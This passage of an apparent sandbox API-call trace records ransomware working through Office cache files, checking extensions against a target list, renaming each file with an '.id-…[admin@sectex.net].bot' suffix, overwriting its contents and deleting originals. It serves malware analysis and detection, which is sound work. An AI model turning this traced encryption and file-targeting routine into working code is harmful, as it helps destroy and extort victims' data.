	[0038.054] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0038.054] WriteFile (in: hFile=0x198, lpBuffer=0xb53b750*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb53b750*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0038.183] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0038.183] WriteFile (in: hFile=0x198, lpBuffer=0xb53b750*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb53b750*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0038.188] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0038.188] WriteFile (in: hFile=0x198, lpBuffer=0xb53b750*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb53b750*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0038.190] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb53b750 | out: hHeap=0x7d60000) returned 1
	[0038.190] CloseHandle (hObject=0x198) returned 1
	[0038.992] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0038.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.992] lstrlenW (lpString=".doc") returned 4
	[0038.992] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0038.992] lstrlenW (lpString=".docx") returned 5
	[0038.992] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0038.992] lstrlenW (lpString=".pdf") returned 4
	[0038.992] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0038.992] lstrlenW (lpString=".xls") returned 4
	[0038.992] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0038.992] lstrlenW (lpString=".xlsx") returned 5
	[0038.992] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0038.992] lstrlenW (lpString=".ppt") returned 4
	[0038.992] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0038.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.992] lstrlenW (lpString=".zip") returned 4
	[0038.992] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0038.992] lstrlenW (lpString=".rar") returned 4
	[0038.992] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0038.992] lstrlenW (lpString=".bz2") returned 4
	[0038.993] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0038.993] lstrlenW (lpString=".7z") returned 3
	[0038.993] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0038.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.993] lstrlenW (lpString=".dbf") returned 4
	[0038.993] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0038.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.993] lstrlenW (lpString=".1cd") returned 4
	[0038.993] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0038.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.993] lstrlenW (lpString=".jpg") returned 4
	[0038.993] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0038.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.993] lstrlenW (lpString=".doc") returned 4
	[0038.993] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0038.993] lstrlenW (lpString=".docx") returned 5
	[0038.993] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0038.993] lstrlenW (lpString=".pdf") returned 4
	[0038.993] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0038.993] lstrlenW (lpString=".xls") returned 4
	[0038.993] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0038.993] lstrlenW (lpString=".xlsx") returned 5
	[0038.993] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0038.993] lstrlenW (lpString=".ppt") returned 4
	[0038.993] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0038.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.993] lstrlenW (lpString=".zip") returned 4
	[0038.993] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0038.993] lstrlenW (lpString=".rar") returned 4
	[0038.993] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0038.993] lstrlenW (lpString=".bz2") returned 4
	[0038.993] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0038.993] lstrlenW (lpString=".7z") returned 3
	[0038.994] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0038.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.994] lstrlenW (lpString=".dbf") returned 4
	[0038.994] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0038.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.994] lstrlenW (lpString=".1cd") returned 4
	[0038.994] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0038.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77
	[0038.994] lstrlenW (lpString=".jpg") returned 4
	[0038.994] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0038.994] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0038.994] lstrlenW (lpString="WordLR.cab") returned 10
	[0038.994] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198
	[0038.994] GetFileSizeEx (in: hFile=0x198, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=43806141) returned 1
	[0038.994] CloseHandle (hObject=0x198) returned 1
	[0038.994] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab")) returned 0x2020
	[0038.994] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.995] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0038.995] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198
	[0038.995] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0038.995] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0038.995] ReadFile (in: hFile=0x198, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0039.000] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0039.000] ReadFile (in: hFile=0x198, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0039.005] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0039.005] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0039.005] ReadFile (in: hFile=0x198, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0039.020] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.020] WriteFile (in: hFile=0x198, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0100, lpOverlapped=0x0) returned 1
	[0039.036] SetEndOfFile (hFile=0x198) returned 1
	[0039.036] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0039.259] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0039.259] WriteFile (in: hFile=0x198, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0039.260] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0039.260] WriteFile (in: hFile=0x198, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0039.262] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0039.262] WriteFile (in: hFile=0x198, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0039.264] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0039.264] CloseHandle (hObject=0x198) returned 1
	[0041.484] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0041.484] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.484] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.484] lstrlenW (lpString=".doc") returned 4
	[0041.484] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0041.484] lstrlenW (lpString=".docx") returned 5
	[0041.484] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0041.484] lstrlenW (lpString=".pdf") returned 4
	[0041.484] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0041.484] lstrlenW (lpString=".xls") returned 4
	[0041.484] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0041.484] lstrlenW (lpString=".xlsx") returned 5
	[0041.484] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0041.484] lstrlenW (lpString=".ppt") returned 4
	[0041.484] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0041.484] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.484] lstrlenW (lpString=".zip") returned 4
	[0041.484] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0041.484] lstrlenW (lpString=".rar") returned 4
	[0041.485] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0041.485] lstrlenW (lpString=".bz2") returned 4
	[0041.485] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0041.485] lstrlenW (lpString=".7z") returned 3
	[0041.485] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0041.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.485] lstrlenW (lpString=".dbf") returned 4
	[0041.485] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0041.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.485] lstrlenW (lpString=".1cd") returned 4
	[0041.485] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0041.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.485] lstrlenW (lpString=".jpg") returned 4
	[0041.485] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0041.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.485] lstrlenW (lpString=".doc") returned 4
	[0041.485] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0041.485] lstrlenW (lpString=".docx") returned 5
	[0041.485] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0041.485] lstrlenW (lpString=".pdf") returned 4
	[0041.485] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0041.485] lstrlenW (lpString=".xls") returned 4
	[0041.485] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0041.485] lstrlenW (lpString=".xlsx") returned 5
	[0041.485] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0041.485] lstrlenW (lpString=".ppt") returned 4
	[0041.485] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0041.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.485] lstrlenW (lpString=".zip") returned 4
	[0041.485] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0041.485] lstrlenW (lpString=".rar") returned 4
	[0041.485] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0041.485] lstrlenW (lpString=".bz2") returned 4
	[0041.486] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0041.486] lstrlenW (lpString=".7z") returned 3
	[0041.486] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0041.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.486] lstrlenW (lpString=".dbf") returned 4
	[0041.486] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0041.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.486] lstrlenW (lpString=".1cd") returned 4
	[0041.486] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0041.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73
	[0041.486] lstrlenW (lpString=".jpg") returned 4
	[0041.486] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0041.536] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0041.536] lstrlenW (lpString="Proof.msi") returned 9
	[0041.536] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0041.536] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=885760) returned 1
	[0041.537] CloseHandle (hObject=0x1d0) returned 1
	[0041.537] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 0x2020
	[0041.537] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.537] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0041.537] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0041.537] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0041.537] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0041.537] GetLastError () returned 0x0
	[0041.537] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xd8400, lpOverlapped=0x0) returned 1
	[0041.560] WriteFile (in: hFile=0x1cc, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xd8410, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xd8410, lpOverlapped=0x0) returned 1
	[0041.574] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0041.574] WriteFile (in: hFile=0x1cc, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0041.574] SetEndOfFile (hFile=0x1cc) returned 1
	[0041.575] CloseHandle (hObject=0x1cc) returned 1
	[0041.959] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0041.959] SetEndOfFile (hFile=0x1d0) returned 1
	[0041.967] CloseHandle (hObject=0x1d0) returned 1
	[0041.967] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0041.967] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 1
	[0041.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.967] lstrlenW (lpString=".doc") returned 4
	[0041.967] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0041.967] lstrlenW (lpString=".docx") returned 5
	[0041.967] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1
	[0041.967] lstrlenW (lpString=".pdf") returned 4
	[0041.967] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0041.967] lstrlenW (lpString=".xls") returned 4
	[0041.967] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0041.967] lstrlenW (lpString=".xlsx") returned 5
	[0041.967] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1
	[0041.967] lstrlenW (lpString=".ppt") returned 4
	[0041.967] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0041.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.968] lstrlenW (lpString=".zip") returned 4
	[0041.968] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0041.968] lstrlenW (lpString=".rar") returned 4
	[0041.968] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0041.968] lstrlenW (lpString=".bz2") returned 4
	[0041.968] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0041.968] lstrlenW (lpString=".7z") returned 3
	[0041.968] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0041.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.968] lstrlenW (lpString=".dbf") returned 4
	[0041.968] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0041.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.968] lstrlenW (lpString=".1cd") returned 4
	[0041.968] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0041.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.968] lstrlenW (lpString=".jpg") returned 4
	[0041.968] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0041.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.968] lstrlenW (lpString=".doc") returned 4
	[0041.968] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0041.968] lstrlenW (lpString=".docx") returned 5
	[0041.968] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1
	[0041.968] lstrlenW (lpString=".pdf") returned 4
	[0041.968] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0041.968] lstrlenW (lpString=".xls") returned 4
	[0041.968] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0041.968] lstrlenW (lpString=".xlsx") returned 5
	[0041.968] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1
	[0041.968] lstrlenW (lpString=".ppt") returned 4
	[0041.968] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0041.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.968] lstrlenW (lpString=".zip") returned 4
	[0041.968] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0041.968] lstrlenW (lpString=".rar") returned 4
	[0041.969] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0041.969] lstrlenW (lpString=".bz2") returned 4
	[0041.969] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0041.969] lstrlenW (lpString=".7z") returned 3
	[0041.969] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0041.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.969] lstrlenW (lpString=".dbf") returned 4
	[0041.969] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0041.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.969] lstrlenW (lpString=".1cd") returned 4
	[0041.969] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0041.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81
	[0041.969] lstrlenW (lpString=".jpg") returned 4
